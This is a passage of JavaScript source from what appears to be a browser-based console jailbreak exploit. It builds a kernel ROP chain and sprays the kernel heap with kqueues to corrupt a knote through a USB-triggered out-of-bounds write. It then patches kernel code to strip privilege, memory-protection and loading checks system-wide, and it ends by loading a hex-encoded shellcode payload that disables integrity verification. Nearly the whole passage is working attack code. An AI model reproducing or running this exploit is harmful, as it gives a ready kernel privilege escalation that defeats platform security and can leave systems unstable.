    kchain2.push(gadgets["pop rdx"]);
    kchain2.push(0xE);
    kchain2.push(gadgets["pop rcx"]);
    kchain2.push(0x0);
    kchain2.push(gadgets["pop r8"]);
    kchain2.push(0x0);
    var idx4_dest = kchain2.get_rsp();
    kchain2.pushSymbolic(); // overwritten with KERNEL_setidt
    kchain2.finalizeSymbolic(idx3, idx3_dest);
    kchain2.finalizeSymbolic(idx4, idx4_dest);

    //Apply kernel patches
    // These remove privilege/integrity checks system-wide for every process,
    // not just this one, until reboot: syscall enabling, setuid (relied on by
    // run_hax/trigger_spray for the success check), mprotect (needed for the
    // RWX payload mapping), prx/dlsym loading restrictions and mmap.
    kchain2.kwrite4(KERNEL_enable_syscalls_1, 0x00000000);
    //patch in reverse because /shrug
    kchain2.kwrite1(KERNEL_enable_syscalls_4, 0xEB);
    kchain2.kwrite2(KERNEL_enable_syscalls_3, 0x9090);
    kchain2.kwrite2(KERNEL_enable_syscalls_2, 0x9090);
    kchain2.kwrite1(KERNEL_setuid, 0xEB);
    kchain2.kwrite4(KERNEL_mprotect, 0x00000000);
    kchain2.kwrite2(KERNEL_prx, 0xE990);
    kchain2.kwrite1(KERNEL_dlsym_1, 0xEB);
    kchain2.kwrite4(KERNEL_dlsym_2, 0xC3C03148);   // 48 31 C0 C3 = xor rax, rax ; ret
    kchain2.kwrite1(KERNEL_mmap_1, 0x37);
    kchain2.kwrite1(KERNEL_mmap_2, 0x37);
    // Install a custom syscall 11: [narg]=2, [sy_call]=gadget, third field=1
    // (field names inferred from the sysent layout; not verified here).
    kchain2.kwrite4(KERNEL_syscall11_1, 0x00000002);
    kchain2.kwrite8_kaddr(KERNEL_syscall11_2, KERNEL_syscall11_gadget);
    kchain2.kwrite4(KERNEL_syscall11_3, 0x00000001);
    //Restore CR0
    // Write `0F 22 C7 C3` = mov cr0, rdi ; ret at KERNEL_setcr0_patch, then call
    // it with rdi = 0x80050033 (WP set again). Note this leaves the patched
    // `mov cr0, rdi ; ret` stub in kernel text.
    kchain2.kwrite4(KERNEL_setcr0_patch, 0xC3C7220F);
    var idx5 = kchain2.write_kernel_addr_to_chain_later(KERNEL_setcr0_patch);
    kchain2.push(gadgets["pop rdi"]);
    kchain2.push(0x80050033);
    var idx5_dest = kchain2.get_rsp();
    kchain2.pushSymbolic(); // overwritten with KERNEL_setcr0_patch
    kchain2.finalizeSymbolic(idx5, idx5_dest);
    //Recover
    // Overwrite the return address at [saved kernel rsp + 0x10] with the
    // kqueue_close epilogue, store (saved rsp + 0x10) into this chain's own
    // `pop rsp` slot, re-enable interrupts and switch back to the kernel stack,
    // so the close() that triggered the pivot returns normally.
    kchain2.rax_kernel(KERNEL_kqueue_close_epi);
    kchain2.push(gadgets["mov rdx, rax"]);
    kchain2.push(gadgets["pop rsi"]);
    kchain2.push(SAVED_KERNEL_STACK_PTR);
    kchain2.push(gadgets["mov rax, [rsi]"]);
    kchain2.push(gadgets["pop rcx"]);
    kchain2.push(0x10);
    kchain2.push(gadgets["add rax, rcx"]);
    kchain2.push(gadgets["mov [rax], rdx"]);
    kchain2.push(gadgets["pop rdi"]);
    var idx6 = kchain2.pushSymbolic();
    kchain2.push(gadgets["mov [rdi], rax"]);
    kchain2.push(gadgets["sti"]);
    kchain2.push(gadgets["pop rsp"]);
    var idx6_dest = kchain2.get_rsp();
    kchain2.pushSymbolic(); // overwritten with old stack pointer
    kchain2.finalizeSymbolic(idx6, idx6_dest);
}
// Lay out the fake kernel objects that the corrupted knote will point at.
// They live at the fixed user address 0x4000 (three pages) so the kernel-side
// OOB write only has to plant a known constant.
function object_setup() {
    //Map fake object
    // syscall 477 = mmap(0x4000, 0xC000, PROT_READ|WRITE (3), 0x1010, -1, 0);
    // 0x1010 = MAP_ANON|MAP_FIXED on FreeBSD.
    var fake_knote = chain.syscall(477, 0x4000, 0x4000 * 0x3, 0x3, 0x1010, 0xFFFFFFFF, 0x0);
    var fake_filtops = fake_knote.add32(0x4000);
    var fake_obj = fake_knote.add32(0x8000);
    // MAP_FIXED should either return 0x4000 or fail; anything else means the
    // fake objects are not where the kernel write expects them.
    if (fake_knote.low != 0x4000) {
        alert("enomem: " + fake_knote);
        while (1);
    }

    //setup fake object
    //KNOTE
    // +0x00 -> fake_obj (read as `[rdi]` by the ipmi gadget below),
    // +0x68 -> fake_filtops (the knote's filterops pointer; offset per this
    //          firmware's struct knote — not otherwise verified).
    {
        p.write8(fake_knote, fake_obj);
        p.write8(fake_knote.add32(0x68), fake_filtops)
    }
    //FILTOPS
    // Expected kernel call sequence (presumably the f_detach slot at +0x10 being
    // invoked with rdi = knote while rax = filtops; TODO confirm):
    //   filtops+0x10 : mov rcx, [rdi] ; mov rsi, rax ; call [rcx + 0x30]
    //                  -> rcx = fake_obj, rsi = fake_filtops
    //   fake_obj+0x30: mov rdi, [rax + 8] ; call [rax]
    //                  -> rdi = kchain.stack, calls filtops+0x0
    //   filtops+0x00 : xchg rdi, rsp ; call [rsi - 0x79]
    //                  -> rsp = kchain.stack, rdi = old kernel rsp
    //   filtops-0x79 : cli ; pop rax ; ret
    //                  -> drops the pushed return address and starts kchain
    //                     with interrupts disabled (kchain issues `sti`).
    {
        p.write8(fake_filtops.sub32(0x79), gadgets["cli ; pop rax"]); //cli ; pop rax ; ret
        p.write8(fake_filtops.add32(0x0), gadgets["xchg rdi, rsp ; call [rsi - 0x79]"]); //xchg rdi, rsp ; call qword ptr [rsi - 0x79]
        p.write8(fake_filtops.add32(0x8), kchain.stack);
        p.write8(fake_filtops.add32(0x10), gadgets["mov rcx, [rdi] ; mov rsi, rax ; call [rcx + 0x30]"]); //mov rcx, qword ptr [rdi] ; mov rsi, rax ; call qword ptr [rcx + 0x30]
    }
    //OBJ
    {
        p.write8(fake_obj.add32(0x30), gadgets["mov rdi, [rax + 8] ; call [rax]"]); //mov rdi, qword ptr [rax + 8] ; call qword ptr [rax]
    }
    //Ensure the fake knote remains available
    // syscall 203 = mlock(0x4000, 0xC000); undone in trigger_spray on success.
    chain.syscall(203, fake_knote, 0xC000);
}
// Heap spray and trigger. Fills the kernel heap with kqueues, each holding one
// knote for the same socket, frees every other one to create holes, then asks
// the user to plug in a USB device — the kernel-side out-of-bounds write
// happens during that external event and is expected to land in one of the
// holes, corrupting an adjacent knote so that it points at the fake objects
// from object_setup(). Closing the remaining kqueues then runs the corrupted
// knote's filterops and pivots into kchain.
var trigger_spray = function () {
    var NUM_KQUEUES = 0x1B0;
    var kqueue_ptr = p.malloc(NUM_KQUEUES * 0x4);
    //Make kqueues
    // syscall 362 = kqueue(); each returned fd is stored as a 32-bit value.
    {
        for (var i = 0; i < NUM_KQUEUES; i++) {
            chain.fcall(window.syscalls[362]);
            chain.write_result4(kqueue_ptr.add32(0x4 * i));
        }
    }
    chain.run();
    var kqueues = p.array_from_address(kqueue_ptr, NUM_KQUEUES);

    // syscall 97 = socket(AF_INET (2), SOCK_STREAM (1), 0). The fd must fall in
    // [0x100, 0x200); presumably the corrupted knote is only reached for an
    // ident in that range — the code gives no further reason, so confirm
    // before changing the bound.
    var that_one_socket = chain.syscall(97, 2, 1, 0);
    if (that_one_socket.low < 0x100 || that_one_socket.low >= 0x200) {
        alert("invalid socket");
        while (1);
    }

    //Spray kevents
    // struct kevent: ident (8) | filter (2) | flags (2) | fflags (4) | data (8) | udata (8)
    // 0xFFFF + 0x010000 packs filter = -1 (EVFILT_READ) and flags = 0x0001 (EV_ADD).
    var kevent = p.malloc(0x20);
    p.write8(kevent.add32(0x0), that_one_socket);
    p.write4(kevent.add32(0x8), 0xFFFF + 0x010000);
    p.write4(kevent.add32(0xC), 0x0);
    p.write8(kevent.add32(0x10), 0x0);
    p.write8(kevent.add32(0x18), 0x0);
    // syscall 363 = kevent(kq, changelist, 1, NULL, 0, NULL): one knote per kqueue.
    {
        for (var i = 0; i < NUM_KQUEUES; i++) {
            chain.fcall(window.syscalls[363], kqueues[i], kevent, 0x1, 0x0, 0x0, 0x0);
        }
    }
    chain.run();

    //Fragment memory
    // syscall 6 = close(): free every other kqueue from index 18 on, leaving
    // holes between the surviving (odd-indexed) ones.
    {
        for (var i = 18; i < NUM_KQUEUES; i += 2) {
            chain.fcall(window.syscalls[6], kqueues[i]);
        }
    }
    chain.run();

    //Trigger OOB
    // The corrupting write is performed by the kernel while this modal dialog
    // is open; the timing is entirely in the user's hands.
    alert("Insert USB now. do not close the dialog until notification pops, remove usb after closing it.");

    //Trigger corrupt knote
    // Closing the remaining kqueues tears down their knotes; the corrupted one
    // dispatches through fake_filtops (object_setup) and runs kchain/kchain2.
    {
        for (var i = 1; i < NUM_KQUEUES; i += 2) {
            chain.fcall(window.syscalls[6], kqueues[i]);
        }
    }
    chain.run();

    // Success check: syscall 23 = setuid(0) now returns 0 because kchain2
    // patched KERNEL_setuid. Then release the fixed mapping and the locked
    // pages: syscall 73 = munmap(0x4000, 0xC000), syscall 325 = munlockall().
    if (chain.syscall(23, 0).low == 0) {
        {
            //cleanup fake knote & release locked gadgets/stack.
            chain.fcall(window.syscalls[73], 0x4000, 0xC000);
            chain.fcall(window.syscalls[325]);
        }
        chain.run();
        return;
    }

    // Failure: the spray may have left the kernel heap inconsistent, so the
    // browser is deliberately crashed (write to address 0) rather than left
    // running on a possibly corrupted kernel state.
    alert(`Failed to trigger the exploit, This happened because you plugged it in too late/early or not at all.
if you did plug it in then the kernel heap is slightly corrupted, this might cause panics later on.
closing this alert will crash the browser for you.`);
    p.write8(0, 0);
    return;
}
//This disables sysveri, see patch.s for more info
var patch _once = function ( ) {
var patch _buffer = chain . syscall ( 477 , 0x0 , 0x4000 , 0x7 , 0x1000 , 0xFFFFFFFF , 0 ) ;
var patch _buffer _view = p . array _from _address ( patch _buffer , 0x1000 ) ;
patch _buffer _view [ 0 ] = 0x00000BB8 ;
patch _buffer _view [ 1 ] = 0xFE894800 ;
patch _buffer _view [ 2 ] = 0x033D8D48 ;
patch _buffer _view [ 3 ] = 0x0F000000 ;
patch _buffer _view [ 4 ] = 0x4855C305 ;
patch _buffer _view [ 5 ] = 0x8B48E589 ;
patch _buffer _view [ 6 ] = 0x95E8087E ;
patch _buffer _view [ 7 ] = 0xE8000000 ;
patch _buffer _view [ 8 ] = 0x00000175 ;
patch _buffer _view [ 9 ] = 0x033615FF ;
patch _buffer _view [ 10 ] = 0x8B480000 ;
patch _buffer _view [ 11 ] = 0x0003373D ;
patch _buffer _view [ 12 ] = 0x3F8B4800 ;
patch _buffer _view [ 13 ] = 0x74FF8548 ;
patch _buffer _view [ 14 ] = 0x3D8D48EB ;
patch _buffer _view [ 15 ] = 0x0000029D ;
patch _buffer _view [ 16 ] = 0xF9358B48 ;
patch _buffer _view [ 17 ] = 0x48000002 ;
patch _buffer _view [ 18 ] = 0x0322158B ;
patch _buffer _view [ 19 ] = 0x8B480000 ;
patch _buffer _view [ 20 ] = 0x00D6E812 ;
patch _buffer _view [ 21 ] = 0x8D480000 ;
patch _buffer _view [ 22 ] = 0x00029F3D ;
patch _buffer _view [ 23 ] = 0x358B4800 ;
patch _buffer _view [ 24 ] = 0x000002E4 ;
patch _buffer _view [ 25 ] = 0x05158B48 ;
patch _buffer _view [ 26 ] = 0x48000003 ;
patch _buffer _view [ 27 ] = 0xB9E8128B ;
patch _buffer _view [ 28 ] = 0x48000000 ;
patch _buffer _view [ 29 ] = 0x02633D8D ;
patch _buffer _view [ 30 ] = 0x8B480000 ;
patch _buffer _view [ 31 ] = 0x0002BF35 ;
patch _buffer _view [ 32 ] = 0x158B4800 ;
patch _buffer _view [ 33 ] = 0x000002C8 ;
patch _buffer _view [ 34 ] = 0xE8128B48 ;
patch _buffer _view [ 35 ] = 0x0000009C ;
patch _buffer _view [ 36 ] = 0x7A3D8D48 ;
patch _buffer _view [ 37 ] = 0x48000002 ;
patch _buffer _view [ 38 ] = 0x02AA358B ;
patch _buffer _view [ 39 ] = 0x8B480000 ;
patch _buffer _view [ 40 ] = 0x0002AB15 ;
patch _buffer _view [ 41 ] = 0x128B4800 ;
patch _buffer _view [ 42 ] = 0x00007FE8 ;
patch _buffer _view [ 43 ] = 0x0185E800 ;
patch _buffer _view [ 44 ] = 0xC35D0000 ;
patch _buffer _view [ 45 ] = 0x6D3D8948 ;
patch _buffer _view [ 46 ] = 0x48000002 ;
patch _buffer _view [ 47 ] = 0x026E3D01 ;
patch _buffer _view [ 48 ] = 0x01480000 ;
patch _buffer _view [ 49 ] = 0x00026F3D ;
patch _buffer _view [ 50 ] = 0x3D014800 ;
patch _buffer _view [ 51 ] = 0x00000270 ;
patch _buffer _view [ 52 ] = 0x713D0148 ;
patch _buffer _view [ 53 ] = 0x48000002 ;
patch _buffer _view [ 54 ] = 0x02723D01 ;
patch _buffer _view [ 55 ] = 0x01480000 ;
patch _buffer _view [ 56 ] = 0x0002933D ;
patch _buffer _view [ 57 ] = 0x3D014800 ;
patch _buffer _view [ 58 ] = 0x00000294 ;
patch _buffer _view [ 59 ] = 0x653D0148 ;
patch _buffer _view [ 60 ] = 0x48000002 ;
patch _buffer _view [ 61 ] = 0x02663D01 ;
patch _buffer _view [ 62 ] = 0x01480000 ;
patch _buffer _view [ 63 ] = 0x0002873D ;
patch _buffer _view [ 64 ] = 0x3D014800 ;
patch _buffer _view [ 65 ] = 0x00000288 ;
patch _buffer _view [ 66 ] = 0x893D0148 ;
patch _buffer _view [ 67 ] = 0x48000002 ;
patch _buffer _view [ 68 ] = 0x028A3D01 ;
patch _buffer _view [ 69 ] = 0x01480000 ;
patch _buffer _view [ 70 ] = 0x00028B3D ;
patch _buffer _view [ 71 ] = 0x3D014800 ;
patch _buffer _view [ 72 ] = 0x0000024C ;
patch _buffer _view [ 73 ] = 0x3D3D0148 ;
patch _buffer _view [ 74 ] = 0xC3000002 ;
patch _buffer _view [ 75 ] = 0xE5894855 ;
patch _buffer _view [ 76 ] = 0x10EC8348 ;
patch _buffer _view [ 77 ] = 0x24348948 ;
patch _buffer _view [ 78 ] = 0x24548948 ;
patch _buffer _view [ 79 ] = 0xED15FF08 ;
patch _buffer _view [ 80 ] = 0x48000001 ;
patch _buffer _view [ 81 ] = 0x4B74C085 ;
patch _buffer _view [ 82 ] = 0x48C28948 ;
patch _buffer _view [ 83 ] = 0x4840408B ;
patch _buffer _view [ 84 ] = 0x2F74C085 ;
patch _buffer _view [ 85 ] = 0x28788B48 ;
patch _buffer _view [ 86 ] = 0x243C3B48 ;
patch _buffer _view [ 87 ] = 0x8B480A74 ;
patch _buffer _view [ 88 ] = 0xC0854800 ;
patch _buffer _view [ 89 ] = 0xECEB1D74 ;
patch _buffer _view [ 90 ] = 0x18788B48 ;
patch _buffer _view [ 91 ] = 0x74FF8548 ;
patch _buffer _view [ 92 ] = 0x7F8B48ED ;
patch _buffer _view [ 93 ] = 0x7C3B4810 ;
patch _buffer _view [ 94 ] = 0xE2750824 ;
patch _buffer _view [ 95 ] = 0xFF1040C7 ;
patch _buffer _view [ 96 ] = 0x48FFFFFF ;
patch _buffer _view [ 97 ] = 0x31107A8D ;
patch _buffer _view [ 98 ] = 0x31D231F6 ;
patch _buffer _view [ 99 ] = 0xA515FFC9 ;
patch _buffer _view [ 100 ] = 0x48000001 ;
patch _buffer _view [ 101 ] = 0x5D10C483 ;
patch _buffer _view [ 102 ] = 0x894855C3 ;
patch _buffer _view [ 103 ] = 0xC0200FE5 ;
patch _buffer _view [ 104 ] = 0xFFFF2548 ;
patch _buffer _view [ 105 ] = 0x220FFFFE ;
patch _buffer _view [ 106 ] = 0x3D8B48C0 ;
patch _buffer _view [ 107 ] = 0x000001C8 ;
patch _buffer _view [ 108 ] = 0x909007C7 ;
patch _buffer _view [ 109 ] = 0x47C79090 ;
patch _buffer _view [ 110 ] = 0x48909004 ;
patch _buffer _view [ 111 ] = 0x358B48B8 ;
patch _buffer _view [ 112 ] = 0x000001AC ;
patch _buffer _view [ 113 ] = 0x08778948 ;
patch _buffer _view [ 114 ] = 0x651047C7 ;
patch _buffer _view [ 115 ] = 0xC73C8B48 ;
patch _buffer _view [ 116 ] = 0x00251447 ;
patch _buffer _view [ 117 ] = 0x47C70000 ;
patch _buffer _view [ 118 ] = 0x89480018 ;
patch _buffer _view [ 119 ] = 0x1C47C738 ;
patch _buffer _view [ 120 ] = 0xB8489090 ;
patch _buffer _view [ 121 ] = 0x7D358B48 ;
patch _buffer _view [ 122 ] = 0x48000001 ;
patch _buffer _view [ 123 ] = 0xC7207789 ;
patch _buffer _view [ 124 ] = 0xC7482847 ;
patch _buffer _view [ 125 ] = 0x47C70100 ;
patch _buffer _view [ 126 ] = 0x0000002C ;
patch _buffer _view [ 127 ] = 0x778D48E9 ;
patch _buffer _view [ 128 ] = 0x158B4834 ;
patch _buffer _view [ 129 ] = 0x00000150 ;
patch _buffer _view [ 130 ] = 0x89F22948 ;
patch _buffer _view [ 131 ] = 0x8B483057 ;
patch _buffer _view [ 132 ] = 0x00016B35 ;
patch _buffer _view [ 133 ] = 0x568D4800 ;
patch _buffer _view [ 134 ] = 0xD7294805 ;
patch _buffer _view [ 135 ] = 0xC148FF89 ;
patch _buffer _view [ 136 ] = 0x814808E7 ;
patch _buffer _view [ 137 ] = 0x0000E9CF ;
patch _buffer _view [ 138 ] = 0x3E894800 ;
patch _buffer _view [ 139 ] = 0x00000D48 ;
patch _buffer _view [ 140 ] = 0x220F0001 ;
patch _buffer _view [ 141 ] = 0x55C35DC0 ;
patch _buffer _view [ 142 ] = 0x0FE58948 ;
patch _buffer _view [ 143 ] = 0x2548C020 ;
patch _buffer _view [ 144 ] = 0xFFFEFFFF ;
patch _buffer _view [ 145 ] = 0x48C0220F ;
patch _buffer _view [ 146 ] = 0x013A3D8B ;
patch _buffer _view [ 147 ] = 0x07C70000 ;
patch _buffer _view [ 148 ] = 0x00C3C031 ;
patch _buffer _view [ 149 ] = 0x353D8B48 ;
patch _buffer _view [ 150 ] = 0xC7000001 ;
patch _buffer _view [ 151 ] = 0xC3C03107 ;
patch _buffer _view [ 152 ] = 0x3D8B4800 ;
patch _buffer _view [ 153 ] = 0x00000130 ;
patch _buffer _view [ 154 ] = 0xC03107C7 ;
patch _buffer _view [ 155 ] = 0x8B4800C3 ;
patch _buffer _view [ 156 ] = 0x00012B3D ;
patch _buffer _view [ 157 ] = 0x3107C700 ;
patch _buffer _view [ 158 ] = 0x4800C3C0 ;
patch _buffer _view [ 159 ] = 0x00A63D8B ;
patch _buffer _view [ 160 ] = 0x87C70000 ;
patch _buffer _view [ 161 ] = 0x001F1E01 ;
patch _buffer _view [ 162 ] = 0x9090F631 ;
patch _buffer _view [ 163 ] = 0x1E0587C7 ;
patch _buffer _view [ 164 ] = 0xC931001F ;
patch _buffer _view [ 165 ] = 0x87C79090 ;
patch _buffer _view [ 166 ] = 0x001F1E09 ;
patch _buffer _view [ 167 ] = 0x9090D231 ;
patch _buffer _view [ 168 ] = 0x1E3E87C7 ;
patch _buffer _view [ 169 ] = 0xC931001F ;
patch _buffer _view [ 170 ] = 0x0D489090 ;
patch _buffer _view [ 171 ] = 0x00010000 ;
patch _buffer _view [ 172 ] = 0xFFC0220F ;
patch _buffer _view [ 173 ] = 0x0000EF15 ;
patch _buffer _view [ 174 ] = 0xC0200F00 ;
patch _buffer _view [ 175 ] = 0xFFFF2548 ;
patch _buffer _view [ 176 ] = 0x220FFFFE ;
patch _buffer _view [ 177 ] = 0x3D8B48C0 ;
patch _buffer _view [ 178 ] = 0x000000DC ;
patch _buffer _view [ 179 ] = 0xC03107C7 ;
patch _buffer _view [ 180 ] = 0x0D4800C3 ;
patch _buffer _view [ 181 ] = 0x00010000 ;
patch _buffer _view [ 182 ] = 0x5DC0220F ;
patch _buffer _view [ 183 ] = 0x737973C3 ;
patch _buffer _view [ 184 ] = 0x5F6D6574 ;
patch _buffer _view [ 185 ] = 0x70737573 ;
patch _buffer _view [ 186 ] = 0x5F646E65 ;
patch _buffer _view [ 187 ] = 0x73616870 ;
patch _buffer _view [ 188 ] = 0x705F3265 ;
patch _buffer _view [ 189 ] = 0x735F6572 ;
patch _buffer _view [ 190 ] = 0x00636E79 ;
patch _buffer _view [ 191 ] = 0x74737973 ;
patch _buffer _view [ 192 ] = 0x725F6D65 ;
patch _buffer _view [ 193 ] = 0x6D757365 ;
patch _buffer _view [ 194 ] = 0x68705F65 ;
patch _buffer _view [ 195 ] = 0x32657361 ;
patch _buffer _view [ 196 ] = 0x73797300 ;
patch _buffer _view [ 197 ] = 0x5F6D6574 ;
patch _buffer _view [ 198 ] = 0x75736572 ;
patch _buffer _view [ 199 ] = 0x705F656D ;
patch _buffer _view [ 200 ] = 0x65736168 ;
patch _buffer _view [ 201 ] = 0x90900033 ;
patch _buffer _view [ 202 ] = 0x00000000 ;
patch _buffer _view [ 203 ] = 0x00000000 ;
patch _buffer _view [ 204 ] = 0x000F88F0 ;
patch _buffer _view [ 205 ] = 0x00000000 ;
patch _buffer _view [ 206 ] = 0x002EF170 ;
patch _buffer _view [ 207 ] = 0x00000000 ;
patch _buffer _view [ 208 ] = 0x00018DF0 ;
patch _buffer _view [ 209 ] = 0x00000000 ;
patch _buffer _view [ 210 ] = 0x00018EF0 ;
patch _buffer _view [ 211 ] = 0x00000000 ;
patch _buffer _view [ 212 ] = 0x02654110 ;
patch _buffer _view [ 213 ] = 0x00000000 ;
patch _buffer _view [ 214 ] = 0x00097230 ;
patch _buffer _view [ 215 ] = 0x00000000 ;
patch _buffer _view [ 216 ] = 0x00402E60 ;
patch _buffer _view [ 217 ] = 0x00000000 ;
patch _buffer _view [ 218 ] = 0x01520108 ;
patch _buffer _view [ 219 ] = 0x00000000 ;
patch _buffer _view [ 220 ] = 0x01520100 ;
patch _buffer _view [ 221 ] = 0x00000000 ;
patch _buffer _view [ 222 ] = 0x00462D20 ;
patch _buffer _view [ 223 ] = 0x00000000 ;
patch _buffer _view [ 224 ] = 0x00462DFC ;
patch _buffer _view [ 225 ] = 0x00000000 ;
patch _buffer _view [ 226 ] = 0x006259A0 ;
patch _buffer _view [ 227 ] = 0x00000000 ;
patch _buffer _view [ 228 ] = 0x006268D0 ;
patch _buffer _view [ 229 ] = 0x00000000 ;
patch _buffer _view [ 230 ] = 0x00625DC0 ;
patch _buffer _view [ 231 ] = 0x00000000 ;
patch _buffer _view [ 232 ] = 0x00626290 ;
patch _buffer _view [ 233 ] = 0x00000000 ;
patch _buffer _view [ 234 ] = 0x00626720 ;
patch _buffer _view [ 235 ] = 0x00000000 ;
//lock payload / call payload / release payload
{
chain . fcall ( window . syscalls [ 203 ] , patch _buffer , 0x4000 ) ;
chain . fcall ( patch _buffer , p . read8 ( KERNEL _BASE _PTR ) ) ;
chain . fcall ( window . syscalls [ 73 ] , patch _buffer , 0x4000 ) ;
}
chain . run ( ) ;
}